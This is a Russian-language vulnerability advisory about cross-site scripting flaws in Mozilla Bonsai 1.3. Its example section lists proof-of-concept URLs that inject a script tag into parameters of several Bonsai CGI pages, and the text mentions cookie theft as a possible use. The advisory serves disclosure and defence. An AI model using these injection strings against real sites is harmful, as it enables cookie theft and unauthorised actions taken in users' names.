Межсайтовый скриптинг в Mozilla Bonsai
| Дата публикации: | 22.08.2002 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1174 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Сразу несколько возможностей межсайтового скриптинга обнаружено в утилите Bonsai от Mozilla. Любой код, эксплуатирующий эту уязвимость, будет выполнен в браузере пользователя в контексте уязвимого сайта. Уязвимость может использоваться для кражи куки, или выполнения других web web-based атак. Также становится возможным выполнять некоторые операции от имени пользователя Bonsai системы. Пример:
webtools/bonsai/cvslog.cgi?file=*&rev=&root= <script>alert(document.domain)</script> /webtools/bonsai/cvslog.cgi?file= <script>alert(document.domain)</script> /webtools/bonsai/cvsblame.cgi?file=/index.html&root= <script>alert(document.domain)</script> /webtools/bonsai/cvsblame.cgi?file= <script>alert(document.domain)</script> /cvsquery.cgi?branch= <script>alert(document.domain)</script>&file= <script>alert(document.domain)/script> &date=<script>alert(document.domain)</script> /cvsquery.cgi?module=<script>alert(document.domain)</script> &branch=&dir=&file= &who=<script>alert(document.domain)</script> &sortby=Date&hours=2&date=week /showcheckins.cgi?person= <script>alert(document.domain)</script> /cvsqueryform.cgi?cvsroot=/cvsroot&module= <script>alert(document.domain)</script>&branch=HEADуязвимость обнаружена в Mozilla Bonsai 1.3 |
| Ссылки: | Advisory: Bonsai XSS and Physical Path Revealing Vulnerabilities |